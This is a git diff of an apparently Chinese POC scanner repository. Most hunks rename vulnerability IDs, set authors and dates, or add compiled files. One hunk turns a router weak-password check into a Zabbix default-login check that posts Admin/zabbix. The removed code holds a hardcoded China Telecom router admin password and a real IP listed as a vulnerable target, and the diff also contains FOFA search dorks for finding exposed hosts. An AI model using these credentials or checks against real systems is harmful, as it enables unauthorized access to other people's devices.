a/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e90bf74 Binary files /dev/null and b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py index c671f5f..e2a1c3d 100644 --- a/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py +++ b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微V9 前台文件上传漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微V9", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/Log_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Log_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..05e4dca Binary files /dev/null and b/poc/Weaver_泛微OA/Log_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Log_Disclosure/poc.py b/poc/Weaver_泛微OA/Log_Disclosure/poc.py index 27797cc..4f7e82f 100644 --- a/poc/Weaver_泛微OA/Log_Disclosure/poc.py +++ b/poc/Weaver_泛微OA/Log_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微OA 日志泄露", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微oa", # 漏洞应用名称 "AppVersion" : "未知", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/RCE_Beanshell/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/RCE_Beanshell/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..407d7e8 Binary files /dev/null and b/poc/Weaver_泛微OA/RCE_Beanshell/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/RCE_Beanshell/poc.py b/poc/Weaver_泛微OA/RCE_Beanshell/poc.py index d6e7fd0..f32ea04 100644 --- a/poc/Weaver_泛微OA/RCE_Beanshell/poc.py +++ b/poc/Weaver_泛微OA/RCE_Beanshell/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微OA Beanshell 远程代码执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微e-cology OA系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a59d9dd Binary files /dev/null and b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/poc.py similarity index 98% rename from poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py rename to poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/poc.py index b7df963..2cae2d3 100644 --- a/poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py +++ b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/poc.py @@ -14,7 +14,7 @@ class POC(POCBase): "CreateDate" : "2022-01-15", # POC创建时间 "UpdateDate" : "2022-01-15", # POC创建时间 "PocDesc" : """ - 略 + 略 """, # POC描述,写更新描述,没有就不写 "name" : "泛微E-office V9.5 SQL注入漏洞", # 漏洞名称 @@ -27,7 +27,7 @@ class POC(POCBase): """, # 漏洞简要描述 "fofa-dork":""" - app="泛微-EOffice" + app="泛微-EOffice" """, # fofa搜索语句 "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 diff --git a/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..0b1f74d Binary files /dev/null and b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py index be5b119..e42bdbf 100644 --- a/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py +++ b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微 E-cology WorkflowCenterTreeData.jsp文件 前台SQL注入漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微 e-cology OA 系统", # 漏洞应用名称 "AppVersion" : "使用oracle数据库的泛微 e-cology OA 系统", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/Sql_inj_E_cology_V8/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Sql_inj_E_cology_V8/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..f1c6057 Binary files /dev/null and b/poc/Weaver_泛微OA/Sql_inj_E_cology_V8/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/CVE_2016_0638/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/CVE_2016_0638/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e84372d Binary files /dev/null and b/poc/Weblogic/CVE_2016_0638/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/CVE_2017_10271/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/CVE_2017_10271/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1f71873 Binary files /dev/null and b/poc/Weblogic/CVE_2017_10271/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/RCE_CVE_2018_3191/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/RCE_CVE_2018_3191/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..eebf27e Binary files /dev/null and b/poc/Weblogic/RCE_CVE_2018_3191/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/SSRF_CVE_2014_4210/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/SSRF_CVE_2014_4210/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e3de184 Binary files /dev/null and b/poc/Weblogic/SSRF_CVE_2014_4210/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/UnAuth_RCE_CVE_2020_14882/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/UnAuth_RCE_CVE_2020_14882/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d160cbe Binary files /dev/null and b/poc/Weblogic/UnAuth_RCE_CVE_2020_14882/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/XMLDecoder_CVE_2017_3506/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/XMLDecoder_CVE_2017_3506/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1eca778 Binary files /dev/null and b/poc/Weblogic/XMLDecoder_CVE_2017_3506/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py index 48193e7..c1e9ac8 100644 --- a/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py +++ b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py @@ -9,7 +9,7 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 @@ -43,7 +43,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Yonyou_用友NC/Dir_List_ERP/__pycache__/poc.cpython-38.pyc b/poc/Yonyou_用友NC/Dir_List_ERP/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..77782e6 Binary files /dev/null and b/poc/Yonyou_用友NC/Dir_List_ERP/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/__pycache__/poc.cpython-38.pyc b/poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d500c54 Binary files /dev/null and b/poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/__pycache__/poc.cpython-38.pyc b/poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8794e2c Binary files /dev/null and b/poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Zabbix/Weak_Pass/__pycache__/poc.cpython-38.pyc b/poc/Zabbix/Weak_Pass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2448a58 Binary files /dev/null and b/poc/Zabbix/Weak_Pass/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py b/poc/Zabbix/Weak_Pass/poc.py similarity index 55% rename from poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py rename to poc/Zabbix/Weak_Pass/poc.py index 98516ad..6e09708 100644 --- a/poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py +++ b/poc/Zabbix/Weak_Pass/poc.py @@ -9,34 +9,30 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 - "CreateDate" : "2022-02-24", # POC创建时间 - "UpdateDate" : "2022-02-24", # POC创建时间 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ 略 """, # POC描述,写更新描述,没有就不写 - "name" : "MAC1200R电信定制版弱口令", # 漏洞名称 - "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 - "AppName" : "MAC1200R电信定制版是一款路由", # 漏洞应用名称 + "name" : "Zabbix弱口令", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "Zabbix", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 - "VulnDate" : "2022-02-24", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ - 通过相关系统测试发现MAC1200R电信定制版存在弱口令。黑客可利用漏洞获取敏感信息、并进一步控制该设备、或者对系统造成破坏。 + zabbix默认口令是 Admin : zabbix """, # 漏洞简要描述 "fofa-dork":""" - "MAC1200R电信定制" - + app="ZABBIX-监控系统" """, # fofa搜索语句 - "example" : "http://117.172.135.8:8888/", # 存在漏洞的演示url,写一个就可以了 + "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 } - # timeout = 10 - - def _verify(self): """ 返回vuln @@ -47,22 +43,26 @@ class POC(POCBase): """ vuln = [False,""] url = self.target + "" # url自己按需调整 + data = "name=Admin&password=zabbix&autologin=1&enter=Sign+in" - headers = {"User-Agent":get_random_ua(), + headers = { + "User-Agent":get_random_ua(), "Connection":"close", "Content-Type": "application/x-www-form-urlencoded", } - data = """ - {"method":"do","login":{"username":"telecomadmin","password":"iLKqgcKP9TefbwK"}} - - """ try: """ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ - req = requests.post(url,headers = headers , data = data ,proxies = self.proxy ,timeout = self.timeout,verify = False) - if req.status_code == 200 and "stok" in req.text: + req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "chkbxRange.init();" in req.text \ + and \ + "incorrect" not in req.text \ + and \ + "" not in req.text \ + and \ + req.status_code == 200: vuln = [True,req.text] else: vuln = [False,req.text] @@ -76,5 +76,4 @@ class POC(POCBase): return vuln def _attack(self): - return self._verify() - + return self._verify() \ No newline at end of file diff --git a/poc/Zentao_禅道/Getshell_test/__pycache__/poc.cpython-38.pyc b/poc/Zentao_禅道/Getshell_test/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..ccc25c8 Binary files /dev/null and b/poc/Zentao_禅道/Getshell_test/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Zentao_禅道/Getshell_test/poc.py b/poc/Zentao_禅道/Getshell_test/poc.py index 0e8fb44..cc938be 100644 --- a/poc/Zentao_禅道/Getshell_test/poc.py +++ b/poc/Zentao_禅道/Getshell_test/poc.py @@ -21,7 +21,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "禅道8.2-9.2.1注入GetShell", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "禅道", # 漏洞应用名称 "AppVersion" : "禅道8.9-9.2.1", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/ZeroShell/RCE_kerbynet/__pycache__/poc.cpython-38.pyc b/poc/ZeroShell/RCE_kerbynet/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..3930956 Binary files /dev/null and b/poc/ZeroShell/RCE_kerbynet/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Zyxel/Login_Pass_NBG2105/__pycache__/poc.cpython-38.pyc b/poc/Zyxel/Login_Pass_NBG2105/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..3686471 Binary files /dev/null and b/poc/Zyxel/Login_Pass_NBG2105/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Zyxel/Login_Pass_NBG2105/poc.py b/poc/Zyxel/Login_Pass_NBG2105/poc.py index bee4057..9363217 100644 --- a/poc/Zyxel/Login_Pass_NBG2105/poc.py +++ b/poc/Zyxel/Login_Pass_NBG2105/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Zyxel NBG2105身份验证绕过", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Zyxel NBG2105", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/common/Apache_Dir_List/__pycache__/poc.cpython-38.pyc b/poc/common/Apache_Dir_List/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2d3eb54 Binary files /dev/null and b/poc/common/Apache_Dir_List/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/common/Apache_Dir_List/poc.py b/poc/common/Apache_Dir_List/poc.py index 089c3ad..06bbd22 100644 --- a/poc/common/Apache_Dir_List/poc.py +++ b/poc/common/Apache_Dir_List/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Apache列目录", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/common/Git_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/common/Git_Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1ad28e8 Binary files /dev/null and b/poc/common/Git_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/common/Git_Info_Disclosure/poc.pyc b/poc/common/Git_Info_Disclosure/poc.pyc index 7e9f52e..0c45933 100644 Binary files a/poc/common/Git_Info_Disclosure/poc.pyc and b/poc/common/Git_Info_Disclosure/poc.pyc differ diff --git a/poc/common/Svn_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/common/Svn_Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..78c4180 Binary files /dev/null and b/poc/common/Svn_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/common/Svn_Info_Disclosure/poc.pyc b/poc/common/Svn_Info_Disclosure/poc.pyc index 087cc58..04401dd 100644 Binary files a/poc/common/Svn_Info_Disclosure/poc.pyc and b/poc/common/Svn_Info_Disclosure/poc.pyc differ diff --git a/poc/common/Url_Alive/__pycache__/poc.cpython-38.pyc b/poc/common/Url_Alive/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..249449d Binary files /dev/null and b/poc/common/Url_Alive/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/common/Url_Alive/poc.pyc b/poc/common/Url_Alive/poc.pyc index dc6f7d4..53d68f5 100644 Binary files a/poc/common/Url_Alive/poc.pyc and b/poc/common/Url_Alive/poc.pyc differ diff --git a/poc/demo/demo/poc.py b/poc/demo/demo/poc.py index 5b8220d..eb5d68a 100644 --- a/poc/demo/demo/poc.py +++ b/poc/demo/demo/poc.py @@ -11,17 +11,17 @@ class POC(POCBase): _info = { "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 - "CreateDate" : "2021-06-09", # POC创建时间 - "UpdateDate" : "2021-06-09", # POC创建时间 + "CreateDate" : "2022-01-01", # POC创建时间 + "UpdateDate" : "2022-01-01", # POC创建时间 "PocDesc" : """ 略 """, # POC描述,写更新描述,没有就不写 "name" : "Demo", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 - "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ """, # 漏洞简要描述 @@ -45,7 +45,8 @@ class POC(POCBase): url = self.target + "" # url自己按需调整 - headers = {"User-Agent":get_random_ua(), + headers = { + "User-Agent":get_random_ua(), "Connection":"close", # "Content-Type": "application/x-www-form-urlencoded", } diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/__pycache__/poc.cpython-38.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4bd21ad Binary files /dev/null and b/poc/jellyfin/File_Read_CVE_2021_21402/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc index 7f5cb0f..fd50364 100644 Binary files a/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc and b/poc/jellyfin/File_Read_CVE_2021_21402/poc.pyc differ diff --git a/poc/jellyfin/SSRF_CVE_2021_29490/__pycache__/poc.cpython-38.pyc b/poc/jellyfin/SSRF_CVE_2021_29490/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1eb4b26 Binary files /dev/null and b/poc/jellyfin/SSRF_CVE_2021_29490/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/php/Backdoor_v8dev/__pycache__/poc.cpython-38.pyc b/poc/php/Backdoor_v8dev/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8db43bb Binary files /dev/null and b/poc/php/Backdoor_v8dev/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/php/Backdoor_v8dev/poc.pyc b/poc/php/Backdoor_v8dev/poc.pyc index f315c1f..22d0293 100644 Binary files a/poc/php/Backdoor_v8dev/poc.pyc and b/poc/php/Backdoor_v8dev/poc.pyc differ diff --git a/poc/一指通/XiaMen_Yizhitong_Weak_pass/__pycache__/poc.cpython-38.pyc b/poc/一指通/XiaMen_Yizhitong_Weak_pass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bbea6a1 Binary files /dev/null and b/poc/一指通/XiaMen_Yizhitong_Weak_pass/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/中硅技术/ZhongGuijishu_Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/中硅技术/ZhongGuijishu_Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..38d614b Binary files /dev/null and b/poc/中硅技术/ZhongGuijishu_Unauth_Access/__pycache__/poc.cpython-38.pyc differ